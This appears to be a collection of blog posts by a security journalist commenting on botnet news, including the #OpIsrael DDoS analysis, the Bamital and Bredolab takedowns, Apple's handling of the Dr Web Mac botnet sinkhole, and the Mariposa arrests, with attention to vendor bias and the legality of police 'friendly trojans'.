Trend has done an analysis of #OpIsrael attacks on April 7. It notes that on that particular day, traffic to one particular website, normally around 90% Israeli, became 90% international due to the botnet DDoS attacks.
This increase in non-Israeli traffic was well distributed, with users from 27 countries (beside Israel itself) accessing the target site.
This is factual and we can take it at face value from a company like Trend. The next comments, however, start with fact but end in interpretation:
[fact] Examining the IP addresses that had accessed the target site, we noticed that some of these were known to be parts of various botnets under the control of cybercriminals. In addition, further investigation revealed that these IP addresses had been previously identified as victims of other attacks like FAKEAV, ransomware, and exploit kits.
[opinion] These findings highlight how major DDoS attacks are, at least in part, not just carried out by hacker groups like Anonymous but by cybercriminals as well. These attacks are not nearly as “harmless” as some would think.
The interpretation is that because a particular PC is known to be infected with a bot, participation in the DDoS attack against Israel was necessarily under the direction of the botherder criminal. But an alternative interpretation could be that the PC owner, entirely independently, decided to take part in the protest. (This is unlikely given the need to hide the source IP during such a protest.) Another possibility, however, could be that an activist protester, not otherwise a criminal, could have hired a botnet from a criminal, not otherwise an activist.
My point is that the final comment (“major DDoS attacks are, at least in part, not just carried out by hacker groups like Anonymous but by cybercriminals as well”) is a non-sequitur from the preceding argument. Trend may be right; but should not be making such a bald statement without further ‘proof’.
It highlights a danger we all face as we shift our news intake from traditional newspapers to blogs: the automatic acceptance of an opinion as fact. Blogs, for their part, should draw a distinction between fact and opinion – and the conclusion of this particular blog should be clearly labelled ‘opinion’.
Before I say anything else, let me just say that I really, really like Sophos; and I really, really like NakedSecurity; and I really, really like Graham Cluley. This is really, really just a comment on how the internet has upset the status quo rather than a criticism of any of the above.
Purely coincidentally I was talking to a fellow freelancer who, like me, is old enough to remember the golden, halcyon days of freelancing back in the mists of the last century. The internet has destroyed all that, along with the majority of magazines
I used to write for for whom I used to write.
“Today,” I said, “company blogs have replaced independent magazines. Just take NakedSecurity, which competes head on with the security magazines in terms of content.”
I stand by that. It’s a great blog and a great read written by experts in their subject. But the one thing it isn’t is ‘independent’.
Consider one of today’s news items: Microsoft and Symantec jointly took down the Bamital botnet (my news story is on Infosecurity Mag here). The problem is that Symantec, a direct competitor of Sophos, gets hardly a look-in on the Sophos blog – which is headlined: Bamital botnet dismantled, as Microsoft seizes control of malware servers.
In fact, you wouldn’t think that Symantec was involved in the actual takedown at all judging from the Sophos account – despite the fact that it published an excellent and detailed analysis of Bamital today.
Coincidence? Possibly; but I doubt it. The problem is that NakedSecurity is so good and so popular that it is often taken as news. It isn’t. It’s a marketing machine for Sophos – and readers should always bear in mind (not just for NakedSecurity, but for all of the company blogs that are replacing the magazines) that the one thing you cannot get from a company blog is independent news.
Apple, it keeps telling us, is on top of security. Well, I used to give it the benefit of the doubt on that; but now I’m not so sure. What worries me is not the existence of a massive Mac botnet (Windows suffers from far more), nor even Apple’s response to the finder of the botnet, Russian firm Dr Web. “We’ve given them all the data we have,” said Dr Web’s chief executive Boris Sharov. Apple’s reply? Zilch – but that’s just arrogance, not really anything to worry about, just something we have to accommodate.
It’s the one thing that Apple actually did do that worries me.
The botnet was discovered by Russian firm Dr Web. Not exactly a big name in security, but a good one nevertheless. The company set up three sinkhole servers to help monitor the botnet, estimate its size – and perhaps take it down. Apple’s one actual response? It contacted Russian Web registrar Reggi.ru and asked for one of the servers to be shut down since it was engaged in malicious activity. It wasn’t – it was one of Dr Web’s sinkholes.
Dr Web’s CEO, Boris Sharov, thinks this was an honest mistake by Apple. I suspect it was a dishonest mistake. I suspect it was more to do with Apple attempting to maintain its carefully constructed facade of invulnerability. I suspect that if it had been one of the better known anti-malware companies that had discovered this 600,000 strong Mac botnet Apple would have reacted differently. Instead they thought they could keep quiet, try to shut down the botnet by taking down a C&C server and nobody would be any the wiser.
Instead the company has simply shown itself to be a child in an adult’s playground. Poor show, Apple.
My news stories on Infosecurity Magazine for Wednesday 21 March…
Two new botnets discovered by ESET and Kaspersky Lab
Kaspersky’s discovery is centered in Russia; ESET’s discovery is centered in Georgia. Both shed new light on the ingenuity and intention of cybercriminals.
21 March 2012
Russian wins Facebook Hacker Cup Again
Eight thousand initial entrants to Facebook’s second annual Hacker Cup from 150 countries were reduced to just 25 finalists from Russia, Germany, Poland, Ukraine, China, South Korea, Japan, Taiwan, and the United States.
21 March 2012
Indian company hacks GSM and usurps IMSI
At a security conference organized by Null in India, Matrix Shell claimed and demonstrated the ability to hack into GSM phones and manipulate the user’s International Mobile Subscriber Identity.
21 March 2012
My news stories on Infosecurity Magazine yesterday:
2012 : Expect DDoS botnets to be smaller, more effective and more of them!
A new analysis of DDoS attacks in the second half of 2011 predicts smaller-sized but increased numbers of specialist DDoS botnets.
28 February 2012
M2M presents new security risks that require new security solutions
We are entering a brave new world of machine to machine (M2M) technology. We know it. We have concerns about it. But are we ready for it?
28 February 2012
Gatekeeper – a new security feature or a walled garden for OSX?
Apple’s OSX 10.8 Mountain Lion due this summer will contain a new feature called Gatekeeper. Opinions vary on whether it is a genuine security feature or the cornerstone of a new walled garden.
28 February 2012
Steve Ranger at Silicon.com published an interesting (Chinese interesting, that is) article on Tuesday (6 Dec): Want to stop botnets overnight? Ban infected PCs from the net. The title is unfortunate, because I think even Steve knows that banning (known) infected PCs wouldn’t stop botnets anytime soon, nevermind overnight.
The time has come to ignore the howls of protest, the cries of ‘I didn’t know!’ and ‘It wasn’t me!’, and to decide that if a PC is infected with viruses or has become part of a botnet, it should no longer be allowed access to the internet…
ISPs can easily spot if a device is part of a botnet, or is riddled with viruses… [No]
Taking these rogue PCs off the net will save the rest of us time, money and hassle. It sends the message that accessing the web is a privilege to be earned and not a right to be unthinkinhgly [sic] abused… [It is now considered a 'human right']
…I’d wager the spam and botnet problem would disappear overnight if such measures were put in place. [No they won't]
Want to stop botnets overnight? Ban infected PCs from the net.
Oh, where do I begin?
Rather than that, I turned to Kaspersky’s David Emm for an opinion. “On the face of it,” he said, “this seems very reasonable – but it’s not as straightforward as it sounds.
“A few years ago,” he continued, “the House of Lords Science and Technology Committee, in its report ‘Personal Internet Security, suggested that we ought to review the ‘neutral carrier’ status of ISPs and make them assume some responsibility for what goes through their network. If we were to do so, however, it would not be very easy to enforce. You would have to demonstrate that an ISP knowingly transmitted malware across its network.”
That word ‘knowingly’ has wider ramifications. What do we do with the user who has the latest security, but gets caught by an unknown 0-day virus? Warn him/her? And then it happens again, and once again. Cut him off at the connectors? It’s not the user’s fault – he or she was as well-protected as possible. Is it the security industry’s fault? Hardly.
“And anyway, continued David, “if we were to introduce such measures, there might be a danger that consumers would wash their hands of the problem and see it as the ISP’s responsibility.” Well, you could make a better case for it being the ‘fault’ of the ISP than the user; so what do we do? Shut down the ISP?
“The truth is,” says David, “that we all have to assume responsibility when we go online.”
Singling out the user is not the way to go.
Over the last couple of days we have been hearing news about the seizure of more than 100 servers by the Dutch police. These servers were involved in the control of a huge number of Bredolab bots; so this can only be seen as a Good Thing.
However, the problem with taking down Command & Control servers is that it leaves the botnet itself in place. It can spring to life again when the criminals set up new C&C servers. So the real solution is to find and cleanse the bots themselves.
Well, the Dutch police attempted to do just this. With help from the Dutch Infosec company Fox-IT and the ISP LeaseWeb, the authorities uploaded their own code – effectively their own trojan – to the infected PCs. The payload is obviously benign. It simply sends the users to a Dutch Police page that explains that they are infected, and provides a link to information on removing the infection. By removing the bots rather than just the servers, the botnet is well and truly dismantled.
Well, I know nothing about Dutch law. But notice that the landing page is in English (there is, of course, also a Dutch version). It is perfectly clear, then, that the Dutch authorities were well aware that they would be ‘infecting’ PCs outside of The Netherlands – and quite likely some in the UK. So, for people in the UK, we are able to look at this from a UK point of view, and not just a Dutch point of view.
And what I want to know is whether the Dutch police action is legal, and/or acceptable. Most people in the security industry will automatically say it is acceptable. After all, it is their job to protect us, and this is a good way of going about it. And the security industry has been ‘infecting’ command and control servers for years – so this is just a small expansion from the servers to the bots. But I’m not so sure it is acceptable – and I’m pretty certain that in the UK it is illegal: that is, the Dutch authorities have broken UK laws if they have infected any UK PCs.
I asked leading lawyer Nicholas Bohm for his view. “Infecting a computer with a trojan would involve offences under the Computer Misuse legislation,” he explained, “unless carried out with some form of lawful authority. In the UK this is available under Part III of the Police Act 1997 (as amended). Authority may be given by chief constables, and others of equivalent rank.
“These powers were primarily introduced to cover the installation of viewing or listening devices in the premises or vehicles of suspects, but they seem to me capable of extending to planting trojans, keystroke loggers etc.”
Yaman Akdeniz, Associate Professor of Law, Faculty of Law, Istanbul Bilgi University, and Director, Cyber-Rights.Org, has similar concerns under the Computer Misuse Act: “Well, there is no ‘good hacker’ or ‘ethical hacker’ defence built into the Computer Misuse Act 1990, nor into the provisions of the Council of Europe CyberCrime Convention for example. So, whatever their intentions are, the access by the Dutch Police into the infected PCs of computer users would be unauthorised in the UK.
“On top of that their ‘modification’ of the content of the infected PCs can also be regarded in breach of the CMA 1990. So, from a legal point of view I find this approach problematic. What if they damage the computers? One may argue that the damage is already done with the initial infection but the access remains unauthorised whether by the bad guys or the good guys.”
So, on balance, the CMA forbids the covert installation of trojans, even if with the best of intentions by the good guys, but could be overridden by ‘chief constables, and others of equivalent rank’ under the Police Act 1977. But Bohm doesn’t believe that the Dutch police behaviour is automatically or necessarily bad. “Some such powers seem to me necessary, just as search warrants are. But I would rather see them controlled judicially – I am unconvinced by the use of retired judges as commissioners to supervise them, and would prefer the decisions involved to be subject to judicial review.”
It seems to me, then, that the Dutch police have broken UK law if they have uploaded their friendly trojan to any UK PCs; and have probably broken other laws all round the world. Judicial oversight may make such behaviour more acceptable; but without it, it should be abhorred. Accepting such behaviour from the authorities, who will always say ‘it is for your own good’ is a dangerous step. Every software developer in the world is aware of the dangers of ‘feature creep’. This sort of behaviour by the authorities is equally subject to feature creep – otherwise known as the slippery slope into authoritarianism.
Be careful out there. Just as Qualys releases its latest report discussing the changing face of today’s threats (and I’ll be discussing that with Wolfgang Kandek in the next post), Websense discovers a perfect example: bad guys are compromising good sites. The Websense Security Labs ThreatSeeker Network has found that Songlyrics.com (which gets about approximately 200,000 daily page views) got compromised with obfuscated malicious code.
Once a user accesses the main page of the song lyrics site, malicious code is injected which leads the user to an exploit site loaded with the Crimepack exploit kit. Only 39.5% of antivirus engines currently recognise this exploit. Any computer exposed and infected just becomes another zombie-bot in the wild; and there’s hardly anything the user can do to prevent this from occurring.
We are seeing the bad guys more frequently compromise popular sites in an effort to infect and exploit the most users, as in this most recent case with songlyrics.com, a site that gets millions of unique visitors. It is unfortunate that in this case, Google Instant results are also helping to steer unaware users to this malicious content. Without real-time content analysis, all users are at risk.
Carl Leonard, Senior Manager, Websense Security Labs
Luis Corrons has been giving some more information on the reported Slovenian Mariposa arrests. You may recall that PandaLabs had been instrumental in the Mariposa takedown early this year. This arrest is not for the Spanish Mariposa botherder (Netkairo) but the original Mariposa developer (Iserdo). (See our interview with Luis here.) Now Luis comments
Back in March, when the story went public, we talked about the Spanish guys arrested, and that they had bought the bot. Probably you realized that we didn’t mention anything about the seller of the bot. This was not because we didn’t know who was behind that, but because the FBI kindly ask us not to disclose that information, as they were chasing Iserdo. Who’s Iserdo? As far as I know, he is a Slovenian guy, the main developer of the butterfly bot and he was in touch with Netkairo, and was who sold the Mariposa bot to Netkairo…
But this is not over. The Guardia Civil is still trying to arrest more people regarding the Mariposa botnet. And Iserdo has been selling the bot to different people, who are creating new botnets (as the one with the “Vodafone Incident“.)
Luis Corrons, technical director, PandaLabs